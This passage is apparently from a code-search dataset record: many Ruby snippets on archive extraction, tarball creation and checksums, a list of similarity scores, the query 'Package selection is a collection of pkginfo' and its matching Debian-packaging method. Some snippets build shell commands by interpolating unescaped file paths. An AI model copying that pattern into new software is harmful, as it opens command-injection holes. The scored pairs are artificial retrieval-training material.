"def extract src_path, dst_path = File.dirname(src_path)\n src_path = File.expand_path(src_path)\n src_name = File.basename(src_path)\n src_suffix = File.extname(src_name)\n src_prefix = File.basename(src_name, src_suffix)\n\n Dir.mktmpdir(nil, dst_path) do |tmp_dir|\n # decompress the archive\n cd tmp_dir do\n case src_name.sub(/\\.part$/, '')\n when /\\.(tar\\.gz|tar\\.Z|tgz|taz)$/i\n system 'tar', '-zxf', src_path\n\n when /\\.(tar\\.bz|tar\\.bz2|tbz|tbz2)$/i\n system 'tar', '-jxf', src_path\n\n when /\\.(tar\\.xz|txz)$/i\n system 'tar', '-Jxf', src_path\n\n when /\\.(tar|cpio|gem)$/i\n system 'tar', '-xf', src_path\n\n when /\\.(tar.lzo|tzo)$/i\n system \"lzop -xc #{src_path.inspect} | tar -xf -\"\n\n when /\\.(lzo)$/i\n system 'lzop', '-x', src_path\n\n when /\\.(gz)$/i\n system \"gunzip -c #{src_path.inspect} > #{src_prefix.inspect}\"\n\n when /\\.(bz|bz2)$/i\n system \"bunzip2 -c #{src_path.inspect} > #{src_prefix.inspect}\"\n\n when /\\.(shar)$/i\n system 'sh', src_path\n\n when /\\.(7z)$/i\n system '7zr', 'x', src_path\n\n when /\\.(zip)$/i\n system 'unzip', src_path\n\n when /\\.(jar)$/i\n system 'jar', 'xf', src_path\n\n when /\\.(rz)$/i\n ln src_path, src_name # rzip removes the archive after extraction\n system 'rzip', '-d', src_name\n\n when /\\.(rar)$/i\n system 'unrar', 'x', src_path\n\n when /\\.(ace)$/i\n system 'unace', 'x', src_path\n\n when /\\.(arj)$/i\n system 'arj', 'x', src_path\n\n when /\\.(arc)$/i\n system 'arc', 'x', src_path\n\n when /\\.(lhz|lha)$/i\n system 'lha', 'x', src_path\n\n when /\\.(a|ar)$/i\n system 'ar', '-x', src_path\n\n when /\\.(Z)$/\n system \"uncompress -c #{src_path.inspect} > #{src_prefix.inspect}\"\n\n when /\\.(z)$/\n system \"pcat #{src_path.inspect} > #{src_prefix.inspect}\"\n\n when /\\.(zoo)$/i\n system 'zoo', 'x//', src_path\n\n when /\\.(cab)$/i\n system 'cabextract', src_path\n\n when /\\.(deb)$/i\n system 'ar', 'x', src_path\n\n when /\\.(rpm)$/i\n system \"rpm2cpio #{src_path.inspect} | cpio -i --make-directories\"\n\n else\n warn \"I do not know how to extract #{src_path.inspect}\"\n end\n end\n\n # clean any mess made by decompression\n manifest = Dir.new(tmp_dir).entries - %w[ . .. ]\n\n if manifest.length == 1 # there was no mess!\n adj_dst = File.join(dst_path, manifest.first)\n adj_src = File.join(tmp_dir, manifest.first)\n else\n adj_src = tmp_dir\n adj_dst = File.join(dst_path, src_name[/.*(?=\\..*?)/])\n end\n\n adj_dst << \"+#{Time.now.to_i}\" until\n not File.exist? adj_dst and\n mv(adj_src, adj_dst, :force => true)\n\n touch tmp_dir # give Dir.mktmpdir() something to remove\n\n adj_dst\n end\nend",
"def test_tar_from_backuprc\n assert_equal('gnutar', config('TAR'))\n end",
"def remote_backup_path #:nodoc:\n full_tarfile+\".gz\"\n end",
"def targz\n files = procedure.get_adapter_configuration.attributes['files']\n if files.is_a?(Array)\n puts system_messages[:archiving]; puts system_messages[:compressing]\n %x{ tar -czf #{File.join(tmp_path, compressed_file)} #{files.map{|f| f.gsub(' ', '\\ ')}.join(' ')} }\n elsif files.is_a?(String)\n puts system_messages[:archiving]; puts system_messages[:compressing]\n %x{ tar -czf #{File.join(tmp_path, compressed_file)} #{files.gsub(' ', '\\ ')} }\n end\n end",
"def checksums; end",
"def archive\n @repo.archive(sha, nil, :format => 'tgz', :prefix => \"#{safe_name}/\")\n end",
"def tarfile #:nodoc:\n rp = Pathname.new(remote_directory) \n rp.basename.to_s+\".tar\"\n end",
"def extract_metadata!\n shell_out \"tar zOxf #{package_path} data.tar.gz | tar zOxf - ./opt/chef-server/version-manifest.json > #{temp_metadata_path}\"\n end",
"def ungzip(tarfile)\n z = Zlib::GzipReader.new(tarfile)\n unzipped = StringIO.new(z.read)\n z.close\n unzipped\n end",
"def untar_file(f, to)\n end",
"def dmg_package_checksum\n case new_resource.source\n when :direct\n package_metadata[:sha256]\n else\n new_resource.checksum\n end\n end",
"def write_tgz\n # Grab the contents of the gzipped tarball for reading\n contents = gzipped_tarball\n\n # Write the .tar.gz into the staging directory\n File.open(\"#{staging_dir}/#{package_name}\", \"wb\") do |tgz|\n while chunk = contents.read(1024)\n tgz.write(chunk)\n end\n end\n\n # Copy the .tar.gz into the package directory\n FileSyncer.glob(\"#{staging_dir}/*.tar.gz\").each do |tgz|\n copy_file(tgz, Config.package_dir)\n end\n end",
"def create_tar_gz_file(gz_base_file_name, source_file)\n gz_name = \"#{gz_base_file_name}.tar.gz\"\n cmd = \"tar -czf #{gz_name} #{source_file}\"\n system(cmd)\n gz_name\n end",
"def ungzip(tarfile)\n z = Zlib::GzipReader.new(tarfile)\n unzipped = StringIO.new(z.read)\n z.close\n unzipped\n end",
"def compress_files_and_copy\n timestamp = Time.now.strftime(\"%Y%m%d-%H%M%S\") + '_'\n tar_file = @backup_folder + timestamp + \"syc-backup.tar.gz\" \n tar_command = \"tar cfz #{tar_file} #{@files.join(\" \")}\"\n\n stdout, stderr, status = Open3.capture3(tar_command)\n\n unless status.exitstatus == 0\n STDERR.puts \"There was a problem executing command\"\n STDERR.puts tar_command\n STDERR.puts stderr\n exit status.exitstatus\n end\n\n tar_file\n end",
"def get_backup\n tar_file = get_tempfile\n safe_run \"tar -cf #{tar_file} #{tar_dir}\"\n tar_file\n end",
"def targz(targzfile, *src)\n raise \"tar.gz file #{targzfile} shouldn't be a directory\" if File.directory? targzfile\n Zlib::GzipWriter.open targzfile do |otarfile|\n tar0(otarfile, *src)\n end\n end",
"def external_dependency_checksum; end",
"def tar___( directory, filename )\r\n raise StandardError, \"Under investigation\"\r\n got = @ndev.rpc.file_archive( :destination => filename, :source => directory )\r\n end",
"def generate_checksums(package)\n File.open(package, \"r\") do |pkg|\n {\n \"MD5sum\" => checksum(pkg.rewind && pkg, :md5),\n \"SHA1\" => checksum(pkg.rewind && pkg, :sha1),\n \"SHA256\" => checksum(pkg.rewind && pkg, :sha256),\n }\n end\n end",
"def ensure_compressed\n return if is_compressed?\n\n original_timestamp = blob_created_at\n content_upload(file_download)\n blob.update_column(:created_at, original_timestamp)\n end",
"def sync_archive_resource(resource, version)\n fetch_resource(resource, version) do |archive|\n dest_dir = %W(#{@datadir} #{resource} #{version}).join('/')\n log.debug \"exploding fetched archive #{archive} into data dir: #{dest_dir}\"\n # process the tar.gz\n Gem::Package::TarReader.new(Zlib::GzipReader.open(archive)) do |targz|\n dest = nil\n targz.each do |entry|\n dest = File.join dest_dir, entry.full_name\n # check if any old data exists, could happen if same resource name reused with different format\n if File.directory? dest\n log.debug \"removing existing directory (#{dest} before extracting archive there\"\n FileUtils.rm_rf dest\n elsif File.file? dest.chomp('/')\n log.debug \"removing existing file (#{dest.chomp}) before extracting archive there\"\n File.delete dest.chomp('/')\n end\n # extract\n if entry.directory?\n FileUtils.mkdir_p dest, mode: entry.header.mode\n elsif entry.file?\n # ensure extraction directory exists\n d_dir = File.dirname(dest)\n FileUtils.mkdir_p d_dir unless File.exist? d_dir\n\n File.open dest, 'wb' do |f|\n f.print entry.read\n end\n FileUtils.chmod entry.header.mode, dest\n elsif entry.header.typeflag == '2' # symlink\n File.symlink entry.header.linkname, dest\n end\n dest = nil\n end\n end\n end\n end",
"def checksum\n fil_header[:checksum]\n end",
"def decompress_package(package)\n @logger.info \"Decompressing #{package.path}\\nto #{@target_location}\"\n FileUtils.mkdir_p(@target_location)\n Dir.chdir(@target_location) do\n # Clear out existing package\n FileUtils.rm_rf Dir.glob(\"#{@target_location}/*\")\n RakeUtils.system \"tar -zxf #{package.path}\"\n end\n @logger.info \"Decompressed\"\n end",
"def test_saves_gzip_files_as_gzipped_but_returns_non_gzipped_path\n location_uncompressed =\n post_file :path => '/foo',\n :file => 'simple_text_file',\n :type => 'application/octet-stream'\n\n location_compressed =\n post_file :path => '/foo',\n :file => 'simple_text_file.gz',\n :type => 'application/x-gzip',\n :expected_extension => 'gz' # note not expected_extension_suffix - we uploaded as a gzip file not a content-encoded plain file\n\n assert_equal location_uncompressed + \".gz\", location_compressed # hash must be based on the content, not the encoded content\n end",
"def checksum_of(url, etag, last_modified)\n #noinspection RubyArgCount\n Zlib::crc32(url + etag + last_modified).to_s\n end",
"def asset_checksum(asset)\n filename = asset.original_file_location\n match = filename.match(/\\ASHA256E-s\\d*--(\\h{64})\\.[a-zA-Z]+\\Z/)\n match ? match[1] : nil\n end",
"def generate_dummy_checksum()\n file = Pedant::Utility.new_random_file\n checksum = Pedant::Utility.checksum(file)\n sandbox = create_sandbox([file])\n upload_to_sandbox(file, sandbox)\n sleep 2 #give s3 some time\n commit_sandbox(sandbox)\n checksum\n end",
"def gzfix(file, dest)\n gzip_header = \"\\x1f\\x8b\".force_encoding(Encoding::ASCII_8BIT)\n limit = 1024\n\n # Read a few lines, looking for gzip header\n file.rewind\n 10.times do |i|\n line = file.readline(limit).force_encoding(Encoding::ASCII_8BIT)\n if line[0,2] == gzip_header # Found gzip!\n if i == 0\n File.rename(file, dest) # Whole file is ok\n else # Use the file from this line on\n IO.copy_stream(file, dest, -1, file.pos - line.size)\n end\n return\n end\n break unless line.ascii_only? # Doesn't look like header lines\n end\n raise \"sqldump didn't seem to give us gzip data\"\n end",
"def is_tgz? archive, type=nil\n type == :tgz || !archive.match(/\\.tgz$/).nil? || !archive.match(/\\.tar.gz$/).nil?\n end",
"def tar_metrics_files\n v = (@verbose ? \"v\" : \"\")\n comm = \"tar cz#{v}f #{@output_dir}/#{@tar_file_name} -C #{@parent_staging_dir} .\"\n puts \"Tarring metrics with: #{comm}\" if @verbose\n system(comm)\n puts \"Created #{@output_dir}/#{@tar_file_name}\"\n end",
"def untar!(tarball)\n system(\"tar -C #{@tmp} -xzf #{tarball}\")\n end",
"def checksum(path)\n FileChecksum.new(path, Digest::SHA1).checksum\n end",
"def uncompress_local_tarball(onhost_tar_file, onhost_base_dir, download_file)\n variant, version, arch, codename = self['platform'].to_array\n case variant\n when /^(fedora|el|centos|redhat|opensuse|sles|debian|ubuntu|cumulus)$/\n execute(\"tar -zxvf #{onhost_tar_file} -C #{onhost_base_dir}\")\n when /^solaris$/\n # uncompress PE puppet-agent tarball\n if version == '10'\n execute(\"gunzip #{onhost_tar_file}\")\n tar_file_name = File.basename(download_file, '.gz')\n execute(\"tar -xvf #{tar_file_name}\")\n elsif version == '11'\n execute(\"tar -zxvf #{onhost_tar_file}\")\n else\n msg = \"Solaris #{version} is not supported by the method \"\n msg << 'uncompress_local_tarball'\n raise ArgumentError, msg\n end\n else\n msg = \"Platform #{variant} is not supported by the method \"\n msg << 'uncompress_local_tarball'\n raise ArgumentError, msg\n end\n end",
"def repackage(path)\n @logger.debug(\"Repackaging box '#{@name}' to: #{path}\")\n\n Util::SafeChdir.safe_chdir(@directory) do\n # Find all the files in our current directory and tar it up!\n files = Dir.glob(File.join(\".\", \"**\", \"*\")).select { |f| File.file?(f) }\n\n # Package!\n Util::Subprocess.execute(\"bsdtar\", \"-czf\", path.to_s, *files)\n end\n\n @logger.info(\"Repackaged box '#{@name}' successfully: #{path}\")\n\n true\n end",
"def checksum\n\t\t@checksum ||= FileManager.checksum(@path)\n #\t\tif file?\n #\t\t\treturn FileManager.checksum(@path)\n #\t\tend\n end",
"def cdtar(cdpath, tarfile, *src)\n raise \"tar file #{tarfile} shouldn't be a directory\" if File.directory? tarfile\n File.open tarfile, 'w' do |otarfile|\n cdtar0 cdpath, otarfile, *src\n end\n end",
"def tar(dir, ext=nil)\n path = File.expand_path(dir)\n skip = path.size + 1\n tar_io = StringIO.new\n Gem::Package::TarWriter.new(tar_io) do |tar|\n Dir[File.join(path, \"**/*#{'.' + ext if ext}\")].each do |file|\n stat = File.stat(file)\n name = file[skip..-1]\n if stat.file?\n tar.add_file_simple(name, stat.mode, stat.size) do |tf|\n tf.write(File.binread(file))\n end\n elsif stat.directory?\n tar.mkdir(name, stat.mode)\n end\n end\n end\n tar_io.string\n end",
"def checksum\n Digest::SHA256.file(sample_dmg).hexdigest\nend",
"def test_compressed_instance\r\n assert_respond_to(@fh, :compressed=)\r\n assert_nothing_raised{ @fh.compressed = true }\r\n assert(File.compressed?(@file))\r\n assert_nothing_raised{ @fh.compressed = false }\r\n assert_equal(false, File.compressed?(@file))\r\n end",
"def unpack_tgz archive, destination, clobber=nil\n validate archive, destination\n\n tar = Zlib::GzipReader.new(File.open(archive, 'rb'))\n if(!should_unpack_tgz?(destination, clobber))\n raise Sprout::Errors::DestinationExistsError.new \"Unable to unpack #{archive} into #{destination} without explicit :clobber argument\"\n end\n\n Archive::Tar::Minitar.unpack(tar, destination)\n\n # Recurse and unpack gzipped children (Adobe did this double \n # gzip with the Linux FlashPlayer for some weird reason)\n [\"#{destination}/**/*.tgz\", \"#{destination}/**/*.tar.gz\"].each do |pattern|\n Dir.glob(pattern).each do |child|\n if(child != archive && dir != File.dirname(child))\n unpack_tgz(child, File.dirname(child))\n end\n end\n end\n end",
"def cleanup_extract_source(attrs={})\n\n execute \"cleanup_source\" do\n cwd Chef::Config[:file_cache_path]\n command \"rm -rf #{attrs['src_dir']}\"\n not_if do ! FileTest.directory?(attrs['src_dir']) end\n action :run\n end\n\n extract_flags = \"tar zxf\" if attrs['src_file'] =~ /tar\\.gz/\n extract_flags = \"tar jxf\" if attrs['src_file'] =~ /tar\\.bz2/\n extract_flags = \"7za x\" if attrs['src_file'] =~ /7z/\n\n execute \"extract_source\" do\n cwd Chef::Config[:file_cache_path]\n command \"#{extract_flags} #{Chef::Config[:file_cache_path]}/#{attrs['src_file']}\"\n action :run\n end\n\nend",
"def compression?; end",
"def compress(path, compress_tar_file)\n Mongolicious.logger.info(\"Compressing database #{path}\")\n\n system(\"cd #{path} && tar -cpf#{compress_tar_file ? 'j' : ''} #{path}.tar.bz2 .\")\n raise \"Error while compressing #{path}\" if $?.to_i != 0\n\n # Remove mongo dump now that we have the bzip\n FileUtils.rm_rf(path)\n\n return \"#{path}.tar.bz2\"\n end",
"def checksum_trailer\n fil_trailer[:checksum]\n end",
"def tarball\n return @tarball if defined? @tarball\n\n require 'open3'\n Dir.mktmpdir do |tmpdir|\n definition.each do |options|\n glob = options.fetch(:glob)\n prefix = options[:prefix]\n ignore_hidden = options[:ignore_hidden]\n\n files = Dir[glob]\n files.reject! { |f| f.start_with?('.') } if ignore_hidden\n\n dest = prefix ? File.join(tmpdir, prefix) : tmpdir\n\n FileUtils.mkpath(dest)\n FileUtils.cp_r(files, dest)\n end\n\n excludes.each do |path|\n full_path = File.join(tmpdir, path)\n if File.file?(full_path)\n File.unlink(File.join(tmpdir, path))\n end\n end\n\n # Specify the correct ruby version in the Dockerfile.\n bundle_dockerfile = File.join(tmpdir, \"Dockerfile\")\n content = IO.read(bundle_dockerfile)\n content = content.gsub(\"{{ruby_version}}\", ruby_version)\n IO.write bundle_dockerfile, content\n\n if dockerfile\n File.unlink bundle_dockerfile\n FileUtils.cp dockerfile, bundle_dockerfile\n end\n\n # Find hash of all files we're sending over.\n digest = Digest::SHA1.new\n Dir[File.join(tmpdir, '**/*')].each do |path|\n if File.file? path\n open path, 'r' do |file|\n digest.update file.read\n end\n end\n end\n @image_name = \"hoosegow:#{digest.hexdigest}\"\n\n # Create tarball of the tmpdir.\n stdout, stderr, status = Open3.capture3 'tar', '-c', '-C', tmpdir, '.'\n\n raise Hoosegow::ImageBuildError, stderr unless stderr.empty?\n\n @tarball = stdout\n end\n end",
"def checksum\n render json: content_files_checksums(druid).to_json\n end",
"def generate_compiled_archive(project)\n name_and_version = \"#{project.name}-#{project.version}\"\n name_and_version_and_platform = \"#{name_and_version}.#{name}\"\n name_and_platform = \"#{project.name}.#{name}\"\n final_archive = \"output/#{name_and_version_and_platform}.tar.gz\"\n archive_directory = \"#{project.name}-archive\"\n\n # previously, we weren't properly handling the case of custom BOM paths.\n # If we have a custom BOM path, during Makefile execution, the top-level\n # BOM is moved to the custom path. So, when cleaning up BOMs for non-custom\n # paths we just want to remove the BOM at the top level of the tarball.\n # But, if we have a custom BOM path we want to move it back to where it\n # was prior to the Makefile execution so we can preserve it as an artifact\n # but not leave it to conflict if it's installed in the same custom path\n # as a project using this archive.\n bill_of_materials_command = 'rm -f bill-of-materials'\n if project.bill_of_materials\n bill_of_materials_command = \"mv .#{project.bill_of_materials.path}/bill-of-materials ../..\"\n end\n\n [\n \"mkdir output\",\n \"mkdir #{archive_directory}\",\n \"gunzip -c #{name_and_version}.tar.gz | '#{tar}' -C #{archive_directory} -xf -\",\n \"rm #{name_and_version}.tar.gz\",\n \"cd #{archive_directory}/#{name_and_version}; #{bill_of_materials_command}; #{tar} cf ../../#{name_and_version_and_platform}.tar *\",\n \"gzip -9c #{name_and_version_and_platform}.tar > #{name_and_version_and_platform}.tar.gz\",\n \"cp build_metadata.#{name_and_platform}.json output/#{name_and_version_and_platform}.json\",\n \"cp bill-of-materials output/#{name_and_version_and_platform}-bill-of-materials ||:\",\n \"cp #{name_and_version_and_platform}.tar.gz output\",\n \"#{shasum} #{final_archive} > #{final_archive}.sha1\"\n ]\n end",
"def file_checksum(file_path)\n Digest::SHA256.file(file_path).hexdigest\n end",
"def external_dependency_checksum\n nil\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def tar_cmd\n # Rely on gnu tar for solaris and OSX.\n case %x{uname -s}.chomp\n when \"SunOS\"\n return \"gtar\"\n when \"Darwin\"\n return \"gnutar\"\n else\n return \"tar\"\n end\n end",
"def targzls(targzfile)\n raise \"invalid tar.gz file #{targzfile}\" unless File.file? targzfile\n Zlib::GzipReader.open targzfile do |otarfile|\n tarls0 otarfile\n end\n end",
"def tarball(destination, paths)\n # check for filepath length limit\n full_destination = File.expand_path(destination)\n if full_destination.length > 259 # 256 chars max; \"C:\\\" doesn't count\n puts \"[TarBall] ERROR cannot generate #{destination} because path exceeds 256 char limit. shorten component name by at least by #{full_destination.length - 259} chars\"\n return\n end\n\n Zlib::GzipWriter.open(destination) do |gzip|\n out = Archive::Tar::Minitar::Output.new(gzip)\n\n paths.each do |fi|\n if File.exist?(fi)\n Archive::Tar::Minitar.pack_file(fi, out)\n else\n puts \"[TarBall] ERROR Could not file file: #{fi}\"\n end\n end\n out.close\n end\n end",
"def checksum_of(origin)\n #noinspection RubyArgCount\n Zlib::crc32(origin).to_s\n end",
"def checksum\n Nanoc::Checksummer.calc(self)\n end",
"def make_tarball_from_files files, options={}\n tarball = options[:filename]\n args = ['czf', tarball, '--exclude-vcs']\n exclude_each options[:exclude] do |exclude|\n args.push '--exclude', exclude\n end\n args.concat files\n run 'tar', *args\n release tarball, :cd => 1\nend",
"def test_dry_run\n @options[:dry_run] = true\n\n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n # Still the same\n assert_equal original_file, file_contents('foo.rb')\n end",
"def extract\n # Only used by tar\n compression_switch = \"\"\n compression_switch = \"z\" if downloaded_file.end_with?(\"gz\")\n compression_switch = \"--lzma -\" if downloaded_file.end_with?(\"lzma\")\n compression_switch = \"j\" if downloaded_file.end_with?(\"bz2\")\n compression_switch = \"J\" if downloaded_file.end_with?(\"xz\")\n\n if Ohai[\"platform\"] == \"windows\"\n if downloaded_file.end_with?(*TAR_EXTENSIONS) && source[:extract] != :seven_zip\n returns = [0]\n returns << 1 if source[:extract] == :lax_tar\n\n shellout!(\"tar #{compression_switch}xf #{downloaded_file} --force-local -C#{project_dir}\", returns: returns)\n elsif downloaded_file.end_with?(*COMPRESSED_TAR_EXTENSIONS)\n Dir.mktmpdir do |temp_dir|\n log.debug(log_key) { \"Temporarily extracting `#{safe_downloaded_file}' to `#{temp_dir}'\" }\n\n shellout!(\"7z.exe x #{safe_downloaded_file} -o#{windows_safe_path(temp_dir)} -r -y\")\n\n fname = File.basename(downloaded_file, File.extname(downloaded_file))\n fname << \".tar\" if downloaded_file.end_with?(\"tgz\", \"txz\")\n next_file = windows_safe_path(File.join(temp_dir, fname))\n\n log.debug(log_key) { \"Temporarily extracting `#{next_file}' to `#{safe_project_dir}'\" }\n shellout!(\"7z.exe x #{next_file} -o#{safe_project_dir} -r -y\")\n end\n else\n shellout!(\"7z.exe x #{safe_downloaded_file} -o#{safe_project_dir} -r -y\")\n end\n elsif downloaded_file.end_with?(\".7z\")\n shellout!(\"7z x #{safe_downloaded_file} -o#{safe_project_dir} -r -y\")\n elsif downloaded_file.end_with?(\".zip\")\n shellout!(\"unzip #{safe_downloaded_file} -d #{safe_project_dir}\")\n else\n shellout!(\"#{tar} #{compression_switch}xf #{safe_downloaded_file} -C#{safe_project_dir}\")\n end\n end",
"def zipfile metadata\n cmd = \"cd #{Myreplicator.configs[@export_obj.source_schema][\"export_stg_dir\"]}; gzip #{@export_obj.filename}\"\n\n puts cmd\n\n zip_result = metadata.ssh.exec!(cmd)\n\n unless zip_result.nil?\n raise Exceptions::ExportError.new(\"Export Error\\n#{zip_result}\") if zip_result.length > 0\n end\n\n metadata.zipped = true\n\n return zip_result\n end",
"def create_chksum_manifest\n chksum_manifest = {}\n files = Dir['*'].select{ |f| File.file? f }\n files.each do |file|\n chksum_manifest[file] = Digest::MD5.file(file).hexdigest\n end\n chksum_manifest\n end",
"def include_checksum?\n include_checksum\n end"
] | [
"0.6814556",
"0.6727206",
"0.6657132",
"0.6571898",
"0.6375211",
"0.63011515",
"0.6265729",
"0.62573904",
"0.6230874",
"0.6166431",
"0.6116192",
"0.6047838",
"0.6046607",
"0.60226125",
"0.602238",
"0.6006378",
"0.5954265",
"0.5954103",
"0.59446114",
"0.5941396",
"0.59183174",
"0.5825434",
"0.5797798",
"0.5796019",
"0.5786474",
"0.5779461",
"0.57768595",
"0.5773908",
"0.5768815",
"0.57599604",
"0.57554233",
"0.5742977",
"0.5712859",
"0.56956553",
"0.56885993",
"0.56725353",
"0.5657912",
"0.56426203",
"0.56373864",
"0.5612758",
"0.5604601",
"0.56031334",
"0.55932605",
"0.5592206",
"0.55727124",
"0.5551238",
"0.5549023",
"0.5525483",
"0.5518496",
"0.5491839",
"0.5487762",
"0.54725516",
"0.5451013",
"0.5449515",
"0.54261553",
"0.5423495",
"0.5416893",
"0.54087156",
"0.5367669",
"0.5361781",
"0.5358016",
"0.53542674",
"0.53196347",
"0.5319214",
"0.5308894",
"0.53066385",
"0.5291066",
"0.5288955",
"0.5286007",
"0.52725136",
"0.5271014",
"0.5268706",
"0.52665263",
"0.5257531",
"0.52569765",
"0.5253356",
"0.5248075",
"0.52392334",
"0.5216542",
"0.5205056",
"0.520133",
"0.5200508",
"0.51972616",
"0.5192329",
"0.51888984",
"0.51789266",
"0.51624465",
"0.51515865",
"0.5151452",
"0.51405627",
"0.5139436",
"0.5138222",
"0.511257",
"0.5103513",
"0.51024336",
"0.510207",
"0.50989854",
"0.509175",
"0.50852567",
"0.5079301"
] | 0.72869587 | 0 |
Package selection is a collection of pkginfo | def package_selection(selection,
force_update: nil,
patch_dir: nil,
package_set_dir: nil,
use_remote_repository: false)
sync_packages = {}
selected_gems = []
selection.each_with_index do |pkginfo, i|
pkg_name = pkginfo.name
pkg = pkginfo.pkg
Autoproj.message "Packaging #{pkg_name} (#{i + 1}/#{selection.size})", :green
# Making sure all packages that require base/cmake due to using Rock CMake macros have
# a dependency on base/cmake
if File.file?(File.join(pkg.srcdir, "CMakeLists.txt"))
cmakelists_txt = File.read(File.join(pkg.srcdir, "CMakeLists.txt"))
if cmakelists_txt =~ /include\(Rock\)|Rock\.cmake/ || cmakelists_txt =~ /find_package\(Rock\)/
pkg.depends_on "base/cmake" unless pkg.name == "base/cmake"
end
end
begin
options = {:force_update => force_update, :patch_dir => patch_dir, :package_set_dir => package_set_dir}
if !use_remote_repository
options[:existing_source_dir] = pkg.srcdir
end
# just to update the required gem property
selected_gems.concat pkginfo.dependencies[:extra_gems]
# Perform the actual packaging
package(pkginfo, options)
sync_packages[pkg_name] = { :debian_name => debian_name(pkginfo),
:build_deps => build_dependencies(pkginfo),
:type => :package
}
rescue Interrupt
raise
rescue Exception => e
Apaka::Packaging.warn "failed to package #{pkg.name}: #{e.message} #{e.backtrace}"
next
end
end
[sync_packages, selected_gems.uniq]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def main_package_set\n each_package_set.find(&:main?)\n end",
"def relevant_packages\n packages.select { |p| p['version'] == version }\n end",
"def expand_package_selection(selection, filter: true)\n result = PackageSelection.new\n\n all_selected_packages = self.all_selected_packages.to_set\n all_source_package_names = all_package_names\n all_osdeps_package_names = os_package_resolver.all_package_names\n selection.each do |sel|\n match_pkg_name = Regexp.new(Regexp.quote(sel))\n all_matches = Array.new\n each_metapackage do |meta_pkg|\n if meta_pkg.name =~ match_pkg_name\n all_matches << [meta_pkg.name, meta_pkg.name == sel]\n end\n end\n all_source_package_names.each do |pkg_name|\n pkg = find_autobuild_package(pkg_name)\n if pkg.name =~ match_pkg_name\n all_matches << [pkg.name, pkg.name == sel]\n elsif \"#{sel}/\".start_with?(\"#{pkg.srcdir}/\")\n all_matches << [pkg.name, true]\n elsif pkg.respond_to?(:builddir) && \"#{sel}/\".start_with?(\"#{pkg.builddir}/\")\n all_matches << [pkg.name, true]\n elsif pkg.srcdir.start_with?(sel) && all_selected_packages.include?(pkg.name)\n all_matches << [pkg.name, false]\n end\n end\n all_osdeps_package_names.each do |pkg_name|\n if pkg_name =~ match_pkg_name\n all_matches << [pkg_name, pkg_name == sel]\n end\n end\n\n exact_matches, partial_matches =\n all_matches.partition { |_, exact_match| exact_match }\n selected_partial_matches, not_selected_partial_matches =\n partial_matches.partition { |pkg_name, _| all_selected_packages.include?(pkg_name) }\n not_selected_partial_matches.clear if result.has_match_for?(sel)\n\n matches =\n [exact_matches, selected_partial_matches, not_selected_partial_matches]\n .find { |m| !m.empty? }\n\n matches&.each do |pkg_name, _|\n update_selection(result, sel, pkg_name, true)\n end\n end\n\n result.filter_excluded_and_ignored_packages(self) if filter\n\n nonresolved = selection - result.matches.keys\n [result, nonresolved]\n end",
"def find_package_set(name)\n each_package_set.find { |set| set.name == name }\n end",
"def find_package_set(selection)\n package_sets.find do |pkg_set|\n name = pkg_set.name\n name == selection ||\n selection.start_with?(\"#{pkg_set.raw_local_dir}/\") ||\n selection.start_with?(\"#{pkg_set.user_local_dir}/\")\n end\n end",
"def package_selected?(name)\n Autoproj.workspace.manifest.package_selected?(name, false)\nend",
"def packages; end",
"def packages\n FileList[package_path('.*')]\n end",
"def all_package_names\n each_autobuild_package.map(&:name)\n end",
"def resolve_package(selection)\n matching_packages = find_packages(selection)\n if matching_packages.empty?\n matching_packages = find_packages_with_directory_shortnames(selection)\n end\n\n if matching_packages.size > 1\n # If there is more than one candidate, check if there are some that are not\n # present on disk\n present = matching_packages.find_all { |pkg| File.directory?(pkg.srcdir) }\n matching_packages = present if present.size == 1\n end\n\n if matching_packages.empty?\n raise CLIInvalidArguments, \"cannot find '#{selection}' in the current autoproj installation\"\n elsif matching_packages.size > 1\n raise CLIAmbiguousArguments, \"multiple packages match '#{selection}' in the current autoproj installation: #{matching_packages.map(&:name).sort.join(', ')}\"\n else\n matching_packages.first\n end\n end",
"def find_package_set_by_name(name)\n @package_sets[name]\n end",
"def ask_for_package_set(message)\n ask_for(message,package_sets)\n end",
"def packages\n ::Packages::Package.all\n end",
"def packages()\n\t\t\t\tpackages = installed_packages()\n\n\t\t\t\tpackagelist = `#{@finkbin} list -n`\n\n\t\t\t\tpackagelist.each_line() { |line|\n\t\t\t\t\tlinearr = line.split()\n\t\t\t\t\tpackages[linearr[0]] = PackageInfo.new()\n\t\t\t\t\tpackages[linearr[0]].name = linearr[0]\n\t\t\t\t\tpackages[linearr[0]].version = linearr[1]\n\t\t\t\t\tpackages[linearr[0]].description = linearr[2]\n\t\t\t\t}\n\n\t\t\t\treturn(packages)\n\t\t\tend",
"def default_packages(validate = true)\n if has_layout?\n layout_packages(validate)\n else\n result = PackageSelection.new\n all_package_names.each do |pkg_name|\n package_type, package_name = resolve_single_package_name(pkg_name).first\n next if excluded?(package_name) || ignored?(package_name)\n\n result.select(package_name, package_name, osdep: (package_type == :osdeps))\n end\n result\n end\n end",
"def versions_for_select(unit_member)\n static_options = [['Most Recent','']]\n dynamic_options = package_branch.packages.map {|p| [p.version, p.id]}\n static_options + dynamic_options\n end",
